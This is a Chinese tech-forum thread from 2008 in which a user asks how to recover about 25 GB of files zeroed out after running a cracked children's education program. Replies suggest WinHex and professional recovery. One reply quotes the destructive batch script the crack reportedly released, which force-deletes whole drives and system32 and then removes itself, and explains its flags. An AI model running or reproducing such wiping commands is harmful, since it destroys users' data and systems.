高手救命，因少儿启蒙大师10.0破解软件致D盘25G多数据丢失，请教高手如何恢复？

yydczyydr

高手救命，因少儿启蒙大师10.0破解软件致D盘25G多数据丢失，请教高手如何恢复？

今天上午我安装了少儿启蒙大师10.0破解软件（http://cv007d.mofile.com/MDA5MTA ... EA7DF1246630FA42A9/少儿启蒙大师10彻底破解版.rar），安装后运行也没有将软件破解，随后再运行破解版就不能运行了，看了一下文件都变成了0字节文件，我意识可能是病毒，然后马上关机，再开机后，D盘三个目录下25G多的共八万多个文件全部变成了0字节的文件，其中有一个目录中有重要资料，我用了很多数据恢复软件均不能恢复其中任何一个文件。我觉得作者是用0字节的文件覆盖了原来的文件，请问各位高手有没有什么办法恢复这些文件？？？

下面是其中一个目录的情况，文件图标没有变化，但是ico的图标都变了：驱动器 D 中的卷是 MYSOFT_D
卷的序列号是 2255-5F79

D:\gjj 的目录

2008-10-16  14:53    <DIR>          .
2008-10-16  14:53    <DIR>          ..
2008-10-26  10:00                 0 200708BF.DBF
2008-10-26  10:00                 0 871272948420061002194818_3_640.jpg
2008-10-26  10:00                 0 aa.IDX
2008-10-26  10:00                 0 aaa.IDX
2008-03-12  20:17    <DIR>          Connections
2008-10-26  10:00                 0 gjj.dbf
2008-10-26  10:00                 0 gjj.FXP
2008-10-26  10:00                 0 gjj.IDX
2008-10-26  10:00                 0 GJJ200703-08.txt
2008-10-26  10:00                 0 GJJ200703-08.xls
2008-10-26  10:00                 0 gjj200708bf.DBF
2008-10-26  10:00                 0 GJJ200709-200804.txt
2008-10-26  10:00                 0 gjj200804bf.DBF
2008-10-26  10:00                 0 gjj200805-08.txt
2008-10-26  10:00                 0 gjjbf0701.DBF
2008-10-26  10:00                 0 gjjbf0701.DBF.dsn
2008-10-26  10:00                 0 gjjbf0804.DBF
2008-10-26  10:00                 0 gjjbf200804.DBF
2008-10-26  10:00                 0 gjjdown.asp
2008-10-26  10:00                 0 gjjnew.DBF
2008-10-26  10:00                 0 index.asp
2008-10-26  10:00                 0 login.asp
2008-10-26  10:00                 0 loginbad.html
2008-10-26  10:00                 0 loginok.asp
2008-10-26  10:00                 0 outlogin.asp
2008-10-26  10:00                 0 rootloginok.asp
2008-10-26  10:00                 0 Thumbs.db
2008-10-26  10:00                 0 unpasswd.asp
2008-10-26  10:00                 0 unpasswdok.asp
2008-10-26  10:00                 0 user.DBF
2008-03-12  20:17    <DIR>          _notes
2008-10-26  10:00                 0 拷贝于 login.asp
2008-10-26  10:00                 0 拷贝于 拷贝于 loginok.asp
2008-03-12  20:17    <DIR>          贷款用文件
              31 个文件              0 字节
               5 个目录 29,388,468,224 可用字节

17roger

重要目录里的文件是什么文件呢？可以的话留下QQ远程看看

sgqms

用winhex看看，扇区中有没有数据，如果全部为0就麻烦了。但我想应该没有这么恶毒的病毒程序。

可儿工程师

谁给远程了？有结果了告诉一声。这已经不是第一个案例了，好像最近要流行起来。知道详情的，给大家分享一下哦~

tclrz100e

说明：以下内容是在网络上收集后整理的，但本人没接触这样的样本，所以不做任何猜想，等接触过样本的人说说情况。

少儿启蒙大师10.0这个版本中作者加入“防破解”程序，就像当年的江民公司在其最新发行的防病毒软件KV300L++版中加入了“逻辑锁”程序，这一程序的主要作用是识别盗版和正版软件用户。当使用盗版密匙盘运行KV300时, 该程序立即启动锁死电脑，使电脑硬盘无法使用，但不会造成破坏。这个软件在运行中发现他的软件被人破解了，当破解补丁运行后，他会释放一个删除磁盘的脚本：
:try
del /F /S /Q  d:\*.*
del /F /S /Q  E:\*.*
del /F /S /Q  F:\*.*
del /F /S /Q  G:\*.*
del /F /S /Q  c:\windows\system32\*.*
del /F /S /Q  c:\winnt\system32\*.*
del /F "C:\Documents and Settings\XX\桌面\少儿启蒙大师10破解补丁\enlighten.exe"
del /F "C:\Documents and Settings\XX\桌面\少儿启蒙大师10破解补丁\enlighten.bak"
del /F "C:\Documents and Settings\XX\桌面\少儿启蒙大师10破解补丁\enlighten.exe.bak"
del /F /S /Q "C:\Documents and Settings\XX\桌面\少儿启蒙大师10破解补丁\*.*
if exist "C:\Documents and Settings\XX\桌面\少儿启蒙大师10破解补丁\enlighten.exe" goto try
if exist "C:\Documents and Settings\XX\桌面\少儿启蒙大师10破解补丁\enlighten.bak" goto try
if exist "C:\Documents and Settings\XX\桌面\少儿启蒙大师10破解补丁\enlighten.exe.bak" goto try
del /F "C:\Documents and Settings\XX\桌面\少儿启蒙大师10破解补丁\$$a.bat"
cls
以上是补丁运行后释放出的""隐藏""脚本文件
懂一些DOS命令的朋友应该都明白以上命令的意思吧
删除c:\windows\system32\*.*
c:\winnt\system32\*.*
还有删除DEFG盘
最后删除自己
真是做的滴水不漏啊!!

解释：
del /f /s /q 是什么意思？
/F 强制删除只读文件。
/S 从所有子目录删除指定文件。
/Q 安静模式。删除全局通配符时，不要求确认。

[ 本帖最后由 tclrz100e 于 2008-10-26 21:30 编辑 ]

yydczyydr

重是文件就是我列出的Gjj目录中的Gjj.dbf文件，是从2005年至今的所有职工住房公积金资料，约五万条记录

我用易我数据恢复中和高级恢复和EasyRecovery Pro_6.10中的高级恢复、原始恢复均不能恢复这些文件。
在winhex中查看这个硬盘上GJJ目录，文件大小也是0字节。以下是从winhex中导出的数据：
文件名 扩展名 大小 创建时间 修改时间 访问时间 属性 第1扇区 大小
200708BF.DBF DBF 0 bytes 2008-03-12 20:17:50 2008-10-26 10:00:02 2008-09-02 15:18:19 A     
871272948420061002194818_3_640.jpg jpg 0 bytes 2008-03-12 20:17:50 2008-10-26 10:00:02 2008-09-09 15:34:56 A     
aa.IDX IDX 0 bytes 2008-03-12 20:17:50 2008-10-26 10:00:02 2008-09-09 15:34:55 A     
aaa.IDX IDX 0 bytes 2008-10-12 09:59:58 2008-10-26 10:00:02 2008-10-12 09:59:58 A     
gjj.dbf dbf 0 bytes 2008-03-12 20:17:50 2008-10-26 10:00:02 2008-09-09 15:35:44 A     
gjj.FXP FXP 0 bytes 2008-03-12 20:17:50 2008-10-26 10:00:02 2008-09-09 08:00:01 A     
gjj.IDX IDX 0 bytes 2008-06-03 09:33:45 2008-10-26 10:00:02 2008-09-06 15:58:25 A     
GJJ200703-08.txt txt 0 bytes 2008-03-12 20:17:50 2008-10-26 10:00:02 2008-07-26 09:10:02 A     
GJJ200703-08.xls xls 0 bytes 2008-03-12 20:17:50 2008-10-26 10:00:02 2008-07-26 09:10:02 A     
gjj200708bf.DBF DBF 0 bytes 2008-06-03 09:31:53 2008-10-26 10:00:02 2008-09-06 15:58:25 A     
GJJ200709-200804.txt txt 0 bytes 2008-06-03 09:30:49 2008-10-26 10:00:02 2008-07-26 09:10:02 A     
gjj200804bf.DBF DBF 0 bytes 2008-06-03 09:35:55 2008-10-26 10:00:02 2008-08-18 09:45:27 A     
gjj200805-08.txt txt 0 bytes 2008-10-12 09:58:50 2008-10-26 10:00:02 2008-10-12 09:58:50 A     
gjjbf0701.DBF DBF 0 bytes 2008-03-12 20:17:50 2008-10-26 10:00:02 2008-07-26 09:10:02 A     
gjjbf0701.DBF.dsn dsn 0 bytes 2008-10-16 14:53:10 2008-10-26 10:00:02 2008-10-16 14:53:22 A     
gjjbf0804.DBF DBF 0 bytes 2008-10-12 09:59:08 2008-10-26 10:00:02 2008-10-12 09:59:08 A     
gjjbf200804.DBF DBF 0 bytes 2008-09-03 09:04:53 2008-10-26 10:00:02 2008-09-03 09:04:53 A     
gjjdown.asp asp 0 bytes 2008-03-12 20:17:50 2008-10-26 10:00:02 2008-07-26 09:10:02 A     
gjjnew.DBF DBF 0 bytes 2008-09-03 09:05:41 2008-10-26 10:00:02 2008-09-06 15:58:25 A     
index.asp asp 0 bytes 2008-03-12 20:17:50 2008-10-26 10:00:02 2008-07-26 09:10:02 A     
login.asp asp 0 bytes 2008-03-12 20:17:50 2008-10-26 10:00:02 2008-07-26 09:10:02 A     
loginbad.html html 0 bytes 2008-03-12 20:17:50 2008-10-26 10:00:02 2008-09-09 15:34:55 A     
loginok.asp asp 0 bytes 2008-03-12 20:17:50 2008-10-26 10:00:02 2008-07-26 09:10:02 A     
outlogin.asp asp 0 bytes 2008-03-12 20:17:50 2008-10-26 10:00:02 2008-07-26 09:10:02 A     
rootloginok.asp asp 0 bytes 2008-03-12 20:17:51 2008-10-26 10:00:02 2008-07-26 09:10:02 A     
Thumbs.db db 0 bytes 2008-03-12 20:17:51 2008-10-26 10:00:02 2008-07-26 09:10:02 A     
unpasswd.asp asp 0 bytes 2008-03-12 20:17:51 2008-10-26 10:00:02 2008-07-26 09:10:02 A     
unpasswdok.asp asp 0 bytes 2008-03-12 20:17:51 2008-10-26 10:00:02 2008-07-26 09:10:02 A     
user.DBF DBF 0 bytes 2008-03-12 20:17:51 2008-10-26 10:00:02 2008-07-26 09:10:02 A     
拷贝于 login.asp asp 0 bytes 2008-03-12 20:17:51 2008-10-26 10:00:02 2008-07-26 09:10:02 A     
拷贝于 拷贝于 loginok.asp asp 0 bytes 2008-03-12 20:17:51 2008-10-26 10:00:02 2008-07-26 09:10:02 A     

现在这个bat文件我觉得不是原来仅仅删除这么简单了，因为如果只是删除的话这些软件应该都能恢复才对。现在看来我觉得是用同名的0字节文件覆盖了原来的文件。你们可以在虚拟机上下载这个软件试验一下。
我的QQ号码是303514505，求高手给我想办法看能不能解决。在线等！

tclrz100e

你要恢复的是一个数据库文件，还是送专业的数据恢复公司恢复吧。

njzhaobo

数据应该是可以恢复的！www.njzhaobo.cm

xxyysq

厉害。。。看来，破解版不能乱用啊

hefeilixin

即使是脚本删除理论上也可以恢复的